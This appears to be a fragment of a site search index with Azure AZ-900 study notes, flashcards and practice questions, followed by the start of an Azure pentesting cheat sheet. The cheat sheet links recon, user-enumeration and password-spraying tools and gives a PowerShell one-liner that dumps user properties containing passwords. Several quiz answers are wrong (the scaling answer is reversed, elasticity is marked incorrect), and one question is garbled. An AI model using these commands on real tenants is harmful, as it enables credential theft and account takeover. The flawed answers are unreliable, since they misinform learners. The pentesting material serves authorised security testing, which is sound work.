                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cost-management","title":"Cost Management","text":"

                            Three cloud pricing models:

                            • Pay-as-you-go: Suitable for development, testing, short-terms projects, businesses that prefer OpEx over CapExp.
                            • Reserved instances: commit to a specific VM type and size for a fixed term (1 or 3 years) in exchange for discounted pricing. Suitable for logn-term projects with predictable resource requirements, and businesses looking to optimize costs. Prepaying, cost savings can be significant, up to 70% or more. Reservations do not automatically renew, however and pricing reverts to pay-as-you-go when reservation term expires.
                            • Spot pricing: Take advantage of unused Azure capacity at a significant discount. Azure can terminate spot instances at any time. Cost-effective, but no guarantees. Suitable for batch processing, data analysis, and non-critical dev and testing, which are cost-sensitive, but interruptible tasks.
                            • Azure Hybrid Benefit: For those who have perpetual licenses of a service and want to move their services to Azure, Azure Hybrid Benefit enables them to repurpose these licenses and gain a corresponding costs savings. BUT it's specific to Windows Server and SQL server, not to all Microsoft licenses that your organization owns.

                            The OpEx cost can be impacted by many factors:

                            • Resource type: When you provision an Azure resource, Azure creates metered instances for that resource. The meters track the resources' usage and generate a usage record that is used to calculate your bill. Meters: Azure creates automatically usage meters when you deploy a resource, so you can track service usage. Usage captured by each usage meter results in a certain number of billable units, and those billable units are converted to charges based on resource types. One billable unit for a particular service will be different in value from the value of a billable unit for another service.
                            • Uptime.
                            • Consumption: Pay-as-you-go payment model where you pay for the resources that you use during a billing cycle. Azure also offers the ability to commit to using a set amount of cloud resources. When you reserve capacity, you\u2019re committing to using and paying for a certain amount of Azure resources during a given period (typically one or three years).
                            • Geography or resource allocation: The cost of power, labor, taxes, and fees vary depending on the location. Due to these variations, Azure resources can differ in costs to deploy depending on the region.
                            • Network Traffic: Bandwidth refers to data moving in and out of Azure datacenters. Some inbound data transfers (data going into Azure datacenters) are free. For outbound data transfers (data leaving Azure datacenters), data transfer pricing is based on zones.
                            • Subscription type: Some Azure subscription types also include usage allowances, which affect costs.
                            • Azure Marketplace: Azure Marketplace lets you purchase Azure-based solutions and services from third-party vendors. Try to avoid recurring costs associated with an offering from a third provider at Azure Marketplace.

                            Additionally it's necessary paying attention to small details such as, for example, every time you provision a VM, additional resources such as storage and networking are also provisioned. If you deprovision the VM, those additional resources may not deprovision at the same time, either intentionally or unintentionally. Maintenance is needed in order adjust cost.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing-calculator","title":"Pricing calculator","text":"

                            This service helps you out to choose the best Azure resource for your needs given a budget. With the pricing calculator, you can estimate the cost of any provisioned resources, including compute, storage, and associated network costs. You can even account for different storage options like storage type, access tier, and redundancy.

                            https://azure.microsoft.com/en-us/pricing/calculator/

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tco-calculator","title":"TCO calculator","text":"

                            Total Cost of Ownership Calculator (TCO calculator) helps you compare the costs for running an on-premises infrastructure compared to an Azure Cloud infrastructure. With the TCO calculator, you enter your current infrastructure configuration, including servers, databases, storage, and outbound network traffic. The TCO calculator then compares the anticipated costs for your current environment with an Azure environment supporting the same infrastructure requirements.

                            https://azure.microsoft.com/en-us/pricing/tco/calculator/

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-cost-management-tool-or-azure-cost-management-billing","title":"Microsoft Cost Management tool - or Azure Cost Management + Billing","text":"

                            If you accidentally provision new resources, you may not be aware of them until it\u2019s time for your invoice. Cost Management is a service that helps avoid those situations. Cost Management provides the ability to quickly check Azure resource costs, create alerts based on resource spend, and create budgets that can be used to automate management of resources.

                            Two key words so far: alerts and budges.

                            Cost analysis is a subset of Cost Management that provides a quick visual for your Azure costs. Using cost analysis, you can quickly view the total cost in a variety of different ways, including by billing cycle, region, resource, and so on. A budget is where you set a spending limit for Azure.

                            Budgets: You can set budgets based on a subscription, resource group, service type, or other criteria. When you set a budget, you will also set a budget alert.

                            Cost alerts provide a single location to quickly check on all of the different alert types that may show up in the Cost Management service. The three types of alerts that may show up are:

                            • Budget alerts: Budget alerts support both cost-based and usage-based budgets (Budgets are defined by cost or by consumption usage when using the Azure Consumption API).
                            • Credit alerts: Credit alerts are generated automatically at 90% and at 100% of your Azure credit balance. Whenever an alert is generated, it's reflected in cost alerts, and in the email sent to the account owners.
                            • Department spending quota alerts: Department spending quota alerts notify you when department spending reaches a fixed threshold of the quota.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#flashcard-questions","title":"Flashcard questions","text":"

                            What is Cloud computing?

                            The delivery of computing services, such as servers, storage, databases, and networking, over the Internet to provide faster innovation, flexible resources, and economies of scale.

                            How does cloud computing lower operating costs?

                            By only paying for the cloud services used, rather than the capital expense of buying hardware and setting up on-site datacenters.

                            Why do organizations move to the cloud?

                            For cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

                            What is the advantage of cloud computing's self-service and on-demand nature?

                            It allows for vast amounts of computing resources to be provisioned quickly, giving businesses a lot of flexibility and taking the pressure off capacity planning.

                            What does \"elastically scaling\" mean in cloud computing?

                            Delivering the right amount of IT resources, such as computing power and storage, at the right time and from the right location.

                            How does cloud computing improve productivity?

                            By removing the need for time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

                            How does cloud computing improve performance?

                            By running on a worldwide network of secure datacenters that are regularly upgraded to the latest generation of efficient computing hardware, reducing network latency and offering greater economies of scale.

                            How does cloud computing improve reliability?

                            By making data backup, disaster recovery, and business continuity easier and less expensive through data mirroring at multiple redundant sites on the cloud provider's network.

                            How does cloud computing improve security?

                            By offering a broad set of policies, technologies, and controls that strengthen the overall security posture, protecting data, apps, and infrastructure from potential threats.

                            What is the main advantage of using cloud computing?

                            Cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

                            What is the biggest difference between cloud computing and traditional IT resources?

                            Traditional IT resources required buying hardware and software, setting up and running on-site datacenters, and paying for electricity and IT experts. Cloud computing eliminates these expenses and provides flexible and on-demand resources.

                            What are the benefits of cloud computing services?

                            Faster innovation, flexible resources, and economies of scale.

                            What is the advantage of cloud computing over traditional on-site datacenters?

                            Cloud computing eliminates the need for hardware setup, software patching, and other time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

                            What is the advantage of cloud computing over a single corporate datacenter?

                            Reduced network latency for applications and greater economies of scale.

                            What is the main advantage of data backup, disaster recovery, and business continuity in cloud computing?

                            It is easier and less expensive.

                            What is the main advantage of security in cloud computing?

                            Cloud providers offer a broad set of policies, technologies, and controls that strengthen the overall security posture.

                            What is the shared responsibility model in cloud computing?

                            The shared responsibility model in cloud computing refers to the division of responsibilities between the cloud provider and the customer in terms of security tasks and workloads.

                            What are the different types of cloud deployment?

                            The different types of cloud deployment are Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and on-premises datacenter.

                            In which type of deployment do customers retain the most responsibilities?

                            In an on-premises datacenter, customers retain the most responsibilities, as they own the entire stack.

                            What responsibilities are always retained by the customer, regardless of the type of deployment?

                            The responsibilities retained by the customer regardless of the type of deployment are data, endpoints, account, and access management.

                            In a SaaS deployment, which party is responsible for protecting the security of the data?

                            In a SaaS deployment, the customer is responsible for protecting the security of the data.

                            In a PaaS deployment, who is responsible for managing and maintaining the underlying infrastructure?

                            In a PaaS deployment, the cloud provider is responsible for managing and maintaining the underlying infrastructure.

                            In an IaaS deployment, who is responsible for managing and maintaining the operating systems and middleware?

                            In an IaaS deployment, the customer is responsible for managing and maintaining the operating systems and middleware.

                            What are the three broad categories of cloud computing services?

                            Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS)

                            What are the benefits of migrating your organization's infrastructure to an IaaS solution?

                            Migrating to IaaS helps reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. It also gives you the flexibility to scale IT resources up and down with demand and quickly provision new applications.

                            Is lift-and-shift migration a common business scenario for using IaaS?

                            Yes. Lift-and-shift migration is a common business scenario for using IaaS. It is the fastest and least expensive method of migrating an application or workload to the cloud.

                            What is PaaS and how does it differ from IaaS?

                            Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. PaaS includes infrastructure such as servers, storage, and networking, but also middleware, development tools, business intelligence services, and more. IaaS only includes infrastructure resources.

                            How does PaaS differ from SaaS?

                            PaaS provides a complete development and deployment environment in the cloud, including infrastructure, middleware, development tools, and more. SaaS is a type of cloud service where users access software applications over the internet, without the need for installation or maintenance.

                            ** How does SaaS work?**

                            With SaaS, users connect to the software over the Internet, usually with a web browser. The service provider manages the hardware and software, and with the appropriate service agreement, will ensure the availability and the security of the app and your data.

                            What are some common examples of SaaS?

                            Common examples of SaaS are email, calendaring, and office tools (such as Microsoft Office 365).

                            What are the components of SaaS?

                            The components of SaaS include hosted applications/apps, development tools, database management, business analytics, operating systems, servers and storage, networking firewalls/security, and data center physical plant/building.

                            ** What are the benefits of using SaaS for an organization?**

                            SaaS provides a complete software solution that you purchase on a pay-as-you-go basis from a cloud service provider. It allows your organization to get quickly up and running with an app at minimal upfront cost.

                            What is a region in Azure?

                            A region in Azure is a geographical area on the planet that contains at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network.

                            Why are regions important in Azure?

                            Regions are important in Azure because they provide flexibility to bring applications closer to users no matter where they are, global regions provide better scalability and redundancy, and they preserve data residency for services.

                            What are some examples of special Azure regions?

                            Examples of special Azure regions include US DoD Central, US Gov Virginia, US Gov Iowa, China East, and China North.

                            What are availability zones in Azure?

                            Availability zones in Azure are created by using one or more datacenters, and there is a minimum of three zones available within a single region.

                            What are region pairs in Azure?

                            Each Azure region is paired with another region within the same geography (such as US, Europe, or Asia) at least 300 miles away. This allows for the replication of resources across a geography and helps reduce the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

                            What are the advantages of region pairs in Azure?

                            Region pairs in Azure include automatic geo-redundant storage and prioritization of one region out of every pair in the event of an extensive Azure outage. Planned Azure updates are rolled out to paired regions one region at a time to minimize downtime and risk of application outage.

                            What is the purpose of region pairs in Azure?

                            The purpose of region pairs in Azure is to provide reliable services and data redundancy by replicating resources across a geography and reducing the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

                            What happens if a region in a region pair is affected by a natural disaster in Azure?

                            If a region in a region pair is affected by a natural disaster in Azure, services will automatically failover to the other region in its region pair.

                            How does Azure provide a high guarantee of availability?

                            Azure provides a high guarantee of availability by having a broadly distributed set of datacenters, creating region pairs that are directly connected and far enough apart to be isolated from regional disasters, and offering automatic geo-redundant storage and failover capabilities.

                            What is the difference between regions, geographies, and availability zones in Azure?

                            In Azure, regions are geographical areas on the planet that contain at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network. Geographies refer to the larger geographical area that a region is located in, such as US, Europe, or Asia. Availability zones are created by using one or more datacenters and there is a minimum of three zones within a single region.

                            What is an availability zone?

                            Availability zones are physically separate datacenters within an Azure region that are equipped with independent power, cooling, and networking, and are connected through high-speed, private fiber-optic networks.

                            What is the purpose of availability zones?

                            The purpose of availability zones is to provide high availability for mission-critical applications by creating duplicate hardware environments, in case one goes down.

                            How are availability zones connected?

                            Availability zones are connected through high-speed, private fiber-optic networks.

                            What types of Azure services support availability zones?

                            VMs, managed disks, load balancers, and SQL databases support availability zones.

                            What are zonal services?

                            Zonal services are resources that are pinned to a specific zone, such as VMs, managed disks, and IP addresses.

                            What are zone-redundant services?

                            Zone-redundant services are services that the platform replicates automatically across zones, such as zone-redundant storage and SQL Database.

                            What are non-regional services?

                            Non-regional services are services that are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.

                            What is a resource in Azure?

                            A manageable item that's available through Azure. Virtual machines (VMs), storage accounts, web apps, databases, and virtual networks are examples of resources.

                            What is a resource group in Azure?

                            A container that holds related resources for an Azure solution. The resource group includes resources that you want to manage as a group.

                            What is the purpose of a resource group in Azure?

                            The purpose of a resource group is to help manage and organize Azure resources by placing resources of similar usage, type, or location in a resource group.

                            Can a resource belong to multiple resource groups in Azure?

                            No, a resource can only be a member of a single resource group.

                            Can resource groups be nested in Azure?

                            No, resource groups can't be nested.

                            What happens when a resource group is deleted in Azure?

                            When a resource group is deleted, all resources contained within it are also deleted.

                            How can resource groups be used for authorization in Azure?

                            Resource groups are also a scope for applying role-based access control (RBAC) permissions. By applying RBAC permissions to a resource group, you can ease administration and limit access to allow only what's needed.

                            What is the relationship between resources and resource groups in Azure?

                            All resources must be in a resource group, and a resource can only be a member of a single resource group.

                            What is an Azure subscription?

                            An Azure subscription is a logical unit of Azure services that links to an Azure account, which is an identity in Azure Active Directory (Azure AD) or in a directory that Azure AD trusts. It provides authenticated and authorized access to Azure products and services and allows you to provision resources.

                            What are the two types of subscription boundaries in Azure?

                            The two types of subscription boundaries in Azure are Billing boundary and Access control boundary.

                            What happens when you delete a subscription in Azure?

                            When you delete a subscription in Azure, all resources contained within it are also deleted.

                            What is the purpose of creating a billing profile in Azure?

                            The purpose of creating a billing profile in Azure is to have its own monthly invoice and payment method.

                            How can you manage costs in Azure?

                            You can manage costs in Azure by creating multiple subscriptions for different types of billing requirements, and Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.

                            What is the purpose of resource access control in Azure?

                            The purpose of resource access control in Azure is to manage and control access to the resources that users provision within each subscription.

                            What is the purpose of an Azure management group? Azure management groups provide a level of scope above subscriptions for efficiently managing access, policies, and compliance for those subscriptions.

                            How do management groups affect subscriptions?

                            All subscriptions within a management group automatically inherit the conditions applied to the management group.

                            Can all subscriptions within a single management group trust different Azure AD tenants?

                            No, all subscriptions within a single management group must trust the same Azure AD tenant.

                            How can management groups be used for governance?

                            You can apply policies to a management group that limit the regions available for VM creation, for example, which would be applied to all management groups, subscriptions, and resources under that management group.

                            How can management groups be used to provide user access to multiple subscriptions?

                            By moving multiple subscriptions under that management group, you can create one role-based access control (RBAC) assignment on the management group, which will inherit that access to all the subscriptions.

                            How many management groups can be supported in a single directory?

                            10,000 management groups can be supported in a single directory.

                            How many levels of depth can a management group tree support?

                            A management group tree can support up to six levels of depth, not including the root level or the subscription level.

                            Can each management group and subscription have multiple parents?

                            No, each management group and subscription can support only one parent.

                            Is each management group and subscription within a single hierarchy in each directory?

                            Yes, all subscriptions and management groups are within a single hierarchy in each directory.

                            If you want to Use this Provision Linux and Windows virtual machines in seconds with the configurations of your choice Virtual Machines Achieve high availability by autoscaling to create thousands of VMs in minutes Virtual Machine Scale Sets Get deep discounts when you provision unused compute capacity to run your workloads Azure Spot Virtual Machines Deploy and scale containers on managed Kubernetes Azure Kubernetes Service (AKS) Accelerate app development using an event-driven, serverless architecture Azure Functions Develop microservices and orchestrate containers on Windows and Linux Azure Service Fabric Quickly create cloud apps for web and mobile with fully managed platform App Service Containerize apps and easily run containers with a single command Azure Container Instances Cloud-scale job scheduling and compute management with the ability to scale to tens, hundreds, or thousands of virtual machines Batch Create highly available, scalable cloud applications and APIs that help you focus on apps instead of hardware Cloud Services Deploy your Azure virtual machines on a physical server only used by your organization Azure Dedicated Host

                            What is the key difference between vertical scaling and horizontal scaling?

                            • Vertical scaling adds more processing power, while horizontal scaling increases storage capacity. (Incorrect)
                            • Vertical scaling adjusts the number of resources, while horizontal scaling adjusts capabilities. (Correct)

                            You are an IT manager and want to ensure that you are notified when the Azure spending reaches a certain threshold. Which feature of Azure Cost Management should you use?

                            • Budgets (Correct)
                            • Cost alerts (Incorrect)

                            Which of the following tools is NOT available within the Azure Security Center for vulnerability management?

                            • Azure Defender (Incorrect)
                            • Azure Policy (Incorrect)
                            • Azure Advisor (Incorrect)
                            • Azure Firewall Manager (Correct)

                            Your company makes use of several SQL\u00a0databases. However, you want to increase their efficiency because of varying and unpredictable workloads. Which of the following can help you with this?

                            • Resource Tags (Incorrect)
                            • Elastic Pools (Correct)
                            • Region Pairs (Incorrect)
                            • Scale Sets (Incorrect)

                            Just like Azure VM\u00a0Scale Sets are used with VMs, you can use\u00a0Elastic Pools\u00a0with Azure SQL\u00a0Databases!

                            SQL Database elastic pools\u00a0are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.

                            Which of the following alert types are available in the Cost Management service? (Select all that apply)

                            • Resource usage alerts (Incorrect)
                            • Budget alerts (Correct)
                            • Department spending quota alerts (Correct)
                            • Credit alerts (Correct)

                            Azure Site Recovery can only be used to replicate and recover virtual machines within Azure.

                            YES / NO

                            The answer is No. Azure Site Recovery can be used to replicate and recover virtual machines not only within Azure, but also from on-premises datacenters to Azure, and between different datacenters or regions. Azure Site Recovery is a disaster recovery solution that provides continuous replication of virtual machines and physical servers to a secondary site, allowing for rapid recovery in case of a disaster. It supports a wide range of scenarios, including replication from VMware, Hyper-V, and physical servers to Azure, as well as replication between Azure regions or datacenters.

                            The ability to provision and deprovision cloud resources quickly, with minimal management effort, is known as _.

                            • Sustainability (Incorrect)
                            • Scalability (Correct)
                            • Elasticity (Incorrect)
                            • Resiliency (Incorrect)

                            The correct answer is Scalability. It specifically refers to the ability to provision and deprovision cloud resources quickly and with minimal management effort.

                            • Resiliency:\u00a0It refers to the ability of a system to recover quickly from failures or disruptions. While resiliency is an important attribute of cloud systems, it is not specifically related to the ability to provision and deprovision resources quickly.
                            • Elasticity:\u00a0It is the ability of a system to scale up or down in response to changes in demand. This is a closely related concept to scalability, but specifically refers to the ability to handle changes in workload or traffic.
                            • Sustainability:\u00a0It refers to the ability of a system to operate in an environmentally friendly manner, with minimal impact on the planet. While sustainability is an important consideration for cloud providers, it is not specifically related to the ability to provision and deprovision resources quickly.

                            It's possible to deploy an Azure VM\u00a0from a MacOS based system by using which of the following options?

                            • Azure Powershell (Correct)
                            • Azure Cloudshell (Correct)
                            • Azure Portal (Correct)
                            • Azure CLI (Correct)

                            Which of the following can be included as artifacts in an Azure Blueprint? (Select all that apply)

                            • Policy assignments (Correct)
                            • Azure Resource Manager templates (Correct)
                            • Role assignments (Correct)
                            • Resource groups (Correct)

                            Azure Service Health allows us to define the critical resources that should never be impacted due to outages and downtimes.

                            YES / NO

                            No. Azure Service Health notifies you about Azure service incidents and planned maintenance. Although you can see when a maintenance is planned and act accordingly to migrate a VM if needed, you can't prevent service failures.

                            It's possible to deploy a new Azure VM\u00a0from a Google Chromebook by using PowerAutomate.

                            YES / NO

                            No. Tricky question! PowerAutomate is not the same as PowerShell.

                            Which of the following services can help you:

                            • Assign\u00a0time-bound\u00a0access to resources using start and end dates (Incorrect)
                            • Enforce\u00a0multi-factor authentication\u00a0to activate any role (Incorrect)
                            • Azure Privileged Identity Management (Correct)
                            • Azure DDos Protection (Incorrect)
                            • Azure Security Center (Incorrect)
                            • Azure Advanced Threat Protection (ATP) (Incorrect)

                            Azure Active Directory (Azure AD)\u00a0Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in your organization. These resources include resources in Azure AD, Azure, and other Microsoft Online Services like Office 365 or Microsoft Intune.

                            Which of the following actions can help you reduce your Azure costs?

                            • Enabling automatic scaling for all virtual machines (Incorrect)
                            • Increasing the number of virtual machines deployed (Incorrect)
                            • Reducing the amount of data transferred between Azure regions (Correct)
                            • Keeping all virtual machines running 24/7 (Incorrect)

                            Reducing the amount of data transferred between Azure regions can help reduce costs by minimizing data egress charges.

                            In the defense-in-depth model, what is the role of the \"network\" layer?

                            • It secures access to virtual machines. (Incorrect)
                            • It ensures the physical security of computing hardware. (Incorrect)
                            • It limits communication between resources and enforces access controls. (Correct)
                            • It focuses on securing access to applications. (Incorrect)

                            The \"network\" layer in the defense-in-depth model is responsible for limiting communication between resources, which helps prevent the spread of attacks. It enforces access controls to ensure that only necessary communication occurs and reduces the risk of an attack affecting other systems.

                            You want to restrict access to certain Azure resources based on departmental requirements within your organization. Which Azure feature would you use?

                            • Resource groups (Incorrect)
                            • Subscriptions (Correct)
                            • Azure Active Directory (Incorrect)
                            • Management groups (Incorrect)

                            In this scenario, you would use\u00a0subscriptions\u00a0to restrict access to certain Azure resources based on departmental requirements. Subscriptions can be used to apply different access-management policies, reflecting different organizational structures. Azure applies access-management policies at the subscription level, which allows you to manage and control access to the resources that users provision within specific subscriptions.

                            Which of the following affect costs in Azure? (Choose 2)

                            • Availability Zone (Incorrect)
                            • Instance size (Correct)
                            • Location (Correct)
                            • Knowledge center usage (Incorrect)

                            The instance size and the location (eg -US or Europe etc ) affect the prices. The knowledge center is completely free to use, and you aren't charged for an Availability Zone.

                            Which of the following can be used to manage your Azure Resources from an iPhone?

                            • Azure Portal (Correct)
                            • Windows PowerShell (Incorrect)
                            • Azure Cloud Shell (Correct)
                            • Azure CLI (Incorrect)
                            • Azure Mobile App (Correct)

                            Azure CLI can be installed on MacOS but it cannot be installed on an iPhone. Windows PowerShell can be installed on MacOS but it cannot be installed on an iPhone.

                            It is possible to deploy Azure resources through a Tablet by using Bash in the Azure Cloud Shell.

                            No / Yes

                            yes. Azure Cloud Shell is an interactive, authenticated,\u00a0browser-accessible (the key to everything since all you need is a browser and the OS\u00a0doesn't matter)\u00a0shell for managing Azure resources. It provides the flexibility of choosing the shell experience that best suits the way you work,\u00a0either Bash or PowerShell.

                            Which of the following services allows you to send events generated from Azure resources to applications?

                            • Azure Event Hub (Incorrect)
                            • Azure Event Grid (Correct)
                            • Azure Cognitive Services (Incorrect)
                            • Azure App Service (Incorrect)

                            What Azure service provides recommendations to optimize your cloud spending based on your usage patterns?

                            • Azure Monitor (Incorrect)
                            • Azure Cost Management and Billing (Correct)
                            • Azure Policy (Incorrect)
                            • Azure Advisor (Incorrect)

                            Azure Cost Management and Billing\u00a0is the correct answer &\u00a0provides recommendations to optimize your cloud spending based on your usage patterns. The service provides insights and cost management tools to help you monitor, allocate, and optimize your cloud costs.

                            Which of the following services allows you to send events generated from Azure resources to applications?

                            • Azure Event Hub
                            • Azure Event Grid
                            • Azure Cognitive Services
                            • Azure App Service
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/pentesting-azure/","title":"Pentesting Azure","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#reconnaissance","title":"Reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#network-discovery","title":"Network discovery","text":"
                            • Nmap
                            • Masscan
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance","title":"DNS reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance_1","title":"DNS reconnaissance","text":"
                            • GitHub - aboul3la/Sublist3r: Fast subdomains enumeration tool for penetration testers
                            • GitHub - rbsec/dnscan
                            • nslookup, host, dig
                            • GitHub - darkoperator/dnsrecon: DNS Enumeration Script
                            • GitHub - lanmaster53/recon-ng: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#certificate-transparency","title":"Certificate transparency","text":"
                            • crt.sh | Certificate Search
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#miscellaneous","title":"Miscellaneous","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shodan","title":"Shodan","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#eyewitness","title":"Eyewitness","text":"

                            GitHub - FortyNorthSecurity/EyeWitness: EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-discovery","title":"Azure Discovery","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#finding-tenantid","title":"Finding tenantID","text":"
                            • https://enterpriseregistration.windows.net/company.com/enrollmentserver/contract?api-version=1.4
                            • https://login.microsoftonline.com/getuserrealm.srf?login=username@company.com&xml=1

                            • AADInternals

                            • Invoke-AADIntReconAsOutsider -DomainName company.com
                            • Get-AADIntTenantDomains -Domain company.com
                            • Invoke-AADIntReconAsOutsider -DomainName company.com
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-ip-ranges","title":"Azure IP ranges","text":"

                            Download Azure IP Ranges and Service Tags \u2013 Public Cloud from Official Microsoft Download Center

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#openid-configuration-document","title":"OpenID configuration document","text":"
                            • https://login.microsoftonline.com/\\/v2.0/.well-known/openid-configuration","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#scrape-azure-resources","title":"Scrape Azure Resources","text":"

                              GitHub - lutzenfried/CloudScraper: CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.

                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#google-dorks","title":"Google Dorks","text":"
                              • Reveal the Cloud with Google Dorks | by Mike Takahashi | Feb, 2023 | InfoSec Write-ups (infosecwriteups.com)
                              • Useful Google Dorks for Open Source Intelligence Investigations - Maltego
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-repositories-and-leaked-credentials","title":"Public repositories and leaked credentials","text":"
                              • gitleaks (https://github.com/zricethezav/gitleaks)
                              • trufflehog (https://github.com/trufflesecurity/truffleHog)
                              • git-secrets (https://github.com/awslabs/git-secrets)
                              • shhgit (https://github.com/eth0izzle/shhgit)
                              • gitrob (https://github.com/michenriksen/gitrob)
                              • dumpsterdiver\u00a0GitHub - securing/DumpsterDiver: Tool to search secrets in various filetypes.
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#enumeration","title":"Enumeration","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-storage-accounts-enumeration","title":"Public Storage Accounts Enumeration","text":"
                              • Public Buckets (osint.sh)
                              • Public Buckets by GrayhatWarfare
                              • GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
                              • Microburst:\u00a0Invoke-EnumerateAzureBlobs
                              • https://storagename.blob.core.windows.net/CONTAINERNAME?restype=container&comp=list\u00a0(https://docs.microsoft.com/en-us/rest/api/storageservices/list-containers2)
                              • GitHub - cyberark/BlobHunter: Find exposed data in Azure with this public blob scanner
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#onedrive-enumeration","title":"OneDrive Enumeration","text":"
                              • GitHub - nyxgeek/onedrive_user_enum: onedrive user enumeration - pentest tool to enumerate valid o365 users
                              • https://www.trustedsec.com/blog/achieving-passive-user-enumeration-with-onedrive/
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#service-enumeration","title":"Service Enumeration","text":"
                              • PS C:\\ > Invoke-EnumerateAzureSubDomains -Base \\ -Verbose
                              • GitHub - 0xsha/CloudBrute: Awesome cloud enumerator
                              • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#subdomain-takeover","title":"Subdomain Takeover","text":"
                                • Subdomain Takeover in Azure: making a PoC | GoDiego
                                ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#user-enumeration","title":"User enumeration","text":"
                                • GitHub - LMGsec/o365creeper: Python script that performs email address validation against Office 365 without submitting login attempts.
                                • https://login.microsoftonline.com/getuserrealm.srf?login=\\&xml=1
                                • GitHub - dirkjanm/ROADtools: A collection of Azure AD tools for offensive and defensive security purposes\u00a0(authenticated)
                                • GitHub - nyxgeek/o365recon: retrieve information via O365 and AzureAD with a valid cred
                                • GitHub - DanielChronlund/DCToolbox: Tools for Microsoft cloud fans
                                • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shadow-admin-privileged-users-enumeration","title":"Shadow Admin / Privileged Users Enumeration","text":"
                                  • GitHub - cyberark/SkyArk: SkyArk helps to discover, assess and secure the most privileged entities in Azure and AWS
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#secrets-in-azure","title":"Secrets in Azure","text":"

                                  Not sure if this still works:\u00a0GitHub - FSecureLABS/Azurite: Enumeration and reconnaissance activities in the Microsoft Azure Cloud.

                                  Find credentials in

                                  • Environment variables or source code (Azure Function)
                                  • .publishsettings
                                  • Web & app config
                                   $users = Get-MsolUser -All; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like \"*password*\"){Write-Output (\"[*]\" + $user.UserPrincipalName + \"[\" + $prop + \"]\" + \" : \" + $user.$prop)}}}\n
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#initial-access-attack","title":"Initial Access Attack","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#password-spraying","title":"Password spraying","text":"
                                  • GitHub - SecurityRiskAdvisors/msspray: Password attacks and MFA validation against various endpoints in Azure and Office 365
                                  • GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
